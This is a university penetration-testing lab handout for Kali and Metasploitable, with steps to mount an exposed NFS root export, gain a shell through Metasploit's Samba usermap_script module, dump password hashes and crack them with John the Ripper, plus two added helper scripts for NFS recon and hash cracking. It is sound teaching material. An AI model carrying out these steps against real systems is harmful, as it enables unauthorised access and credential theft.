Prerequisites:
- Kali Linux Virtual Machine
- Metasploitable Virtual Machine
Objectives:
The main purpose of this exercise is to learn how to use the tools that ship with Kali to find and exploit
the deliberately vulnerable services that Metasploitable exposes.
Call for Help:
Do your best to try the tasks below. If you’re confused or need help, feel free to email or text me at any
point and I will gladly try to help you. If you’re having an issue, chances are other people are as well,
and I can update the instructions/comments/add content as necessary.
Tasks:
Setup
- You’ll need both Kali and Metasploitable running simultaneously. You can do this by running both as
virtual machines on one host, or by pairing with a friend and running Metasploitable over the network (be
careful here: Metasploitable is deliberately vulnerable, so keep it on an isolated or host-only network).
- Make sure you follow the instructions from lecture, and ensure the networks are set up
accordingly with your layout.
Intro:
- Refamiliarize yourself with the following sections from Offensive Security’s website:
a. Introduction
b. Metasploit Fundamentals
c. Information Gathering
https://www.offensive-security.com/metasploit-unleashed/
- Remember, your Kali and Metasploitable virtual machines can easily be
redownloaded if you encounter an error. Don’t be afraid to experiment.
- You’ll need the rpcbind package and the nfs-common package to run these steps. In Kali, while
connected to the internet via NAT or Bridged Mode, run the following two commands (prefix them
with sudo if you are not logged in as root):
apt-get install rpcbind
apt-get install nfs-common
Network Scanning:
- Setup
- Go to the below link and request a trial of Nessus. You’ll need the activation key to continue
this part of the lesson. You can use your Rowan email for this registration, or a disposable
email address.
NOTE: YOU WILL HAVE 7 DAYS FROM THE START OF THE TRIAL TO COMPLETE THE ASSIGNMENT.
https://www.tenable.com/products/nessus
- The below commands are to be run from Kali until otherwise noted.
- In Kali, open Firefox and go to the following URL.
https://www.tenable.com/products/nessus
- Select the appropriate download for your Kali architecture, for example
Nessus-10.0.0-debian6_amd64.deb
Note: The version may have changed since the time of this writing; simply use the latest
version.
- Change to the download location and install Nessus with the command
sudo dpkg -i <Nessus Package Name>
- Once the package is installed successfully, start the service with
/etc/init.d/nessusd start
(on a current Kali with systemd, sudo systemctl start nessusd does the same thing).
- Open Firefox on Kali and go to https://127.0.0.1:8834 or https://localhost:8834
- Confirm any security exceptions to continue (Nessus ships with a self-signed certificate, which is
why the browser warns).
- When prompted, create any username and password combination, and use the activation
key you requested to finish setup. It will take some time to finish configuration. You may need
to find the default username and password depending on the way you installed it.
- Scanning
a. Click “New Scan” in the upper right corner.
b. Select “Advanced Scan”.
c. Enter a name such as “Test Scan” and add the target IP of your Metasploitable Virtual Machine.
d. Create another advanced scan called “Test Scan Credentialed”.
e. Under Credentials, add SSH credentials and use Password as the Authentication Method.
f. Use msfadmin and msfadmin for the username and password and select sudo in the
elevate privileges box.
g. Save this scan.
h. Select the checkboxes next to each scan, and click “More” and “Launch”.
- You can review the results by selecting a scan and opening its Vulnerabilities tab.
Produce a screenshot of the two scans. What do you notice between the two scans?
- Scan a friend’s machine (with their permission) or another computer you own, such as a Raspberry Pi.
Find anything interesting?
Exploit #1:
- The below commands are to be run from Kali until otherwise noted.
- Let’s do some reconnaissance again to determine what might be exploitable using a detailed
NMAP scan.
nmap -v -sV <IP Address of Target>
Note port 2049. Explain what this service is, and why it may be interesting for us to examine
further.
- Let’s see if we can query the system a little further by using rpcinfo.
rpcinfo -p <IP Address of Target>
Several ports should be open for nfs. Does this confirm your findings in Step 1?
What about the program column? Does this also confirm your findings in Step 1?
Hint: https://www.iana.org/assignments/rpc-program-numbers/rpc-program-numbers.xhtml
- If this is truly what we think it is, we should think about using the showmount command.
Review what the showmount command does by using man showmount and provide a brief
explanation.
- Let’s see what we find by running the below command.
showmount -e <IP Address of Target>
What is the output telling you?
- Review the Linux mount command using the man mount command as well as the df command
using man df.
Create a local mount on your Kali machine by executing the following commands (mount needs
root, so run it with sudo or from a root shell; nolock tells the client not to use the NFS lock
manager, so no local rpc.statd is needed).
cd /
mount -t nfs <IP Address of Target>:/ /mnt -o nolock
- Interrogate your mount by executing df -k
- Change directory to your mount point by running cd /mnt
- Change directories in your mount point by executing cd /mnt/home/msfadmin
- Create a new file in that location by using the command touch.
- Print the current date and time by using the command date.
- Run ls -l on the file you just created and note its owner: NFS passes your numeric UID from Kali
through to the target’s filesystem (unless the export squashes root), so check which owner the
file ended up with on the target.
Submit a screenshot like the above. What did we just do? Try to navigate; do we have any
restrictions? What else might we be able to do?
- Switch to your Metasploitable Virtual Machine.
- Execute the command showmount -a.
What is this telling you?
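The script below is an added example, not part of the original lab handout. It takes the recon steps of Exploit #1 (rpcinfo -p, showmount -e, mount) and shows how to read their output programmatically: which RPC program numbers mean NFS is really there, which ports they sit on, what each export line means, and the resulting mount command. The rpcinfo and showmount listings embedded in it are constructed samples in the format those tools print; the port numbers and the target address 10.0.2.4 are assumptions, not captured from a real Metasploitable VM. Given a target address as its only argument it runs rpcinfo and showmount for real instead (those tools come from the rpcbind and nfs-common packages installed in the Intro).

```shell
#!/bin/sh
# Added example (not from the lab): interpret rpcinfo -p / showmount -e output
# and build the lab's mount command from it. The samples below are constructed;
# ports and the 10.0.2.4 address are assumptions.

RPCINFO_SAMPLE='   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  52071  status
    100024    1   tcp  55063  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100021    1   udp  47599  nlockmgr
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100005    1   udp  59369  mountd
    100005    1   tcp  54033  mountd'

SHOWMOUNT_SAMPLE='Export list for 10.0.2.4:
/ *'

# Distinct ports on which a given RPC service name is registered.
# Usage: rpc_ports "$rpcinfo_output" nfs
rpc_ports() {
    printf '%s\n' "$1" | awk -v svc="$2" 'NR > 1 && $5 == svc { print $4 }' | sort -u
}

# IANA-assigned RPC program numbers: 100003 is NFS itself, 100005 is the
# mount daemon. Succeeds only if both are registered, i.e. the host can both
# serve NFS and hand out mounts.
rpc_has_nfs() {
    printf '%s\n' "$1" | awk 'NR > 1 && $1 == "100003" { nfs = 1 }
                             NR > 1 && $1 == "100005" { mnt = 1 }
                             END { exit !(nfs && mnt) }'
}

# Export path and the client spec allowed to mount it, one pair per line.
# "/ *" means the whole root filesystem is exported to any client address.
nfs_exports() {
    printf '%s\n' "$1" | awk 'NR > 1 && NF >= 2 { print $1, $2 }'
}

# The exact mount command the lab uses, built for one export.
nfs_mount_cmd() {
    printf 'sudo mount -t nfs %s:%s /mnt -o nolock\n' "$1" "$2"
}

# Live run (needs network and the rpcbind/nfs-common tools): sh this.sh <target-ip>
if [ $# -eq 1 ]; then
    TARGET=$1
    RPC=$(rpcinfo -p "$TARGET")
    EXPORTS=$(showmount -e "$TARGET")
    if rpc_has_nfs "$RPC"; then
        echo "nfs on port(s): $(rpc_ports "$RPC" nfs | tr '\n' ' ')"
        nfs_exports "$EXPORTS" | while read -r path clients; do
            echo "export $path allowed from $clients"
            nfs_mount_cmd "$TARGET" "$path"
        done
    else
        echo "no NFS program registered on $TARGET"
    fi
fi
```

The check that matters is the program column, not the port: 2049 is only the conventional NFS port, while 100003 and 100005 in rpcinfo's output are the registrations that prove an NFS server and its mount daemon are actually running. The "*" client spec in the export line is what lets an arbitrary machine such as your Kali VM mount the share at all.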
Exploit #2:
- The below commands are to be run from Kali until otherwise noted.
- Let’s do some reconnaissance again to determine what might be exploitable using a detailed
NMAP scan.
nmap -v -sV <IP Address of Target>
Note ports 139 and 445. What service are they most commonly associated with?
- Start Metasploit by typing msfconsole or using the icon.
- Determine whether there’s a Metasploit module for Samba by typing search samba.
- Type the command use exploit/multi/samba/usermap_script
- Set the host for exploitation using set RHOSTS <IP Address of Target> (older Metasploit
versions name this option RHOST; show options tells you which your version expects).
- Exploit by typing exploit
- Once you’ve exploited, you’ll have a shell session on the target. You’ll need to move back to the
Metasploit console to execute the next commands; you can do that using the background command.
If for some reason the background command doesn’t work, you can try CTRL+Z.
- Then from the Metasploit framework console type use post/linux/gather/hashdump, point it at
your session with set SESSION <session id> (sessions -l lists them), and run it.
- The module prints the path of the unshadowed password file it saved under your Metasploit loot
directory (~/.msf4/loot by default); copy that path.
- In a new Kali terminal (not Metasploit) run the command john <unshadowed password file>
- What is this? Research John the Ripper. How does this software work? Be detailed.
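The script below is an added example, not part of the original lab handout and not code from Metasploit or John the Ripper. It shows what the "unshadowed password file" in Exploit #2 is (a passwd file with each "x" replaced by the hash from the matching shadow entry, which is what the hashdump module builds for you) and reduces what john does to its core loop: pull the salt out of a stored hash, hash every candidate password the same way, and compare. All passwd and shadow entries are constructed; msfadmin's hash is computed at run time with openssl passwd -1 (md5crypt, the $1$ scheme) from the lab's msfadmin password and an assumed salt, so it is a real hash of a made-up entry rather than one captured from a VM.

```shell
#!/bin/sh
# Added example (not from the lab, Metasploit or john): what an unshadowed
# password file is and the core of how a cracker attacks a salted hash.
# All entries are constructed; the salt XN10Zj2c is an assumption.

# Constructed /etc/passwd lines. World-readable; the password field is just "x".
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash'

# The salt is an assumption; the password is the one the lab uses for SSH.
MSF_SALT=XN10Zj2c
MSF_PASSWORD=msfadmin
if command -v openssl >/dev/null 2>&1; then
    MSF_HASH=$(openssl passwd -1 -salt "$MSF_SALT" "$MSF_PASSWORD")
else
    MSF_HASH='!'   # no openssl available: mark the account as having no usable hash
fi

# Constructed /etc/shadow lines. Readable by root only; the second field is
# $id$salt$hash, and "*" or "!" means the account has no usable password.
SHADOW_SAMPLE="root:*:14684:0:99999:7:::
msfadmin:$MSF_HASH:14684:0:99999:7:::
service:!:14684:0:99999:7:::"

# What unshadow (and the hashdump module) does: for every passwd line, swap
# the "x" for the hash field of the matching shadow line, so john gets user,
# hash and GECOS/shell information in one file.
# Usage: unshadow_merge "$passwd_text" "$shadow_text"
unshadow_merge() {
    printf '%s\n' "$1" | while IFS=: read -r user pw rest; do
        hash=$(printf '%s\n' "$2" | awk -F: -v u="$user" '$1 == u { print $2; exit }')
        if [ -n "$hash" ]; then pw=$hash; fi
        printf '%s:%s:%s\n' "$user" "$pw" "$rest"
    done
}

# The core of what john does for a $1$ hash, with none of its speed: take the
# salt out of the stored hash, run each candidate through the same algorithm
# with that salt, and report the candidate whose output matches. The salt is
# why you cannot precompute one table for every user: each salt needs its own
# run. john adds optimised hashing, word-mangling rules, incremental
# (brute-force) mode and cracking many hashes per pass on top of this loop.
# Usage: crack_md5crypt '$1$salt$hash' "word1 word2 ..."; prints the match.
crack_md5crypt() {
    stored=$1
    salt=$(printf '%s\n' "$stored" | cut -d'$' -f3)
    for cand in $2; do
        if [ "$(openssl passwd -1 -salt "$salt" "$cand")" = "$stored" ]; then
            printf '%s\n' "$cand"
            return 0
        fi
    done
    return 1
}

# Stand-alone demo: sh this.sh demo prints the merged file and tries a tiny
# constructed wordlist against the msfadmin entry.
if [ "${1:-}" = "demo" ]; then
    unshadow_merge "$PASSWD_SAMPLE" "$SHADOW_SAMPLE"
    crack_md5crypt "$MSF_HASH" "password 123456 letmein msfadmin" || echo "no match"
fi
```

Against the real loot file, the two john invocations you will use most are john --wordlist=/usr/share/wordlists/rockyou.txt <file> (the Kali wordlist ships gzipped, so gunzip it first) and john --show <file> to print what has already been cracked; john reads the hash format from the $1$, $6$ or $y$ prefix, so the same commands work on a modern system's sha512crypt or yescrypt hashes, only far more slowly per guess.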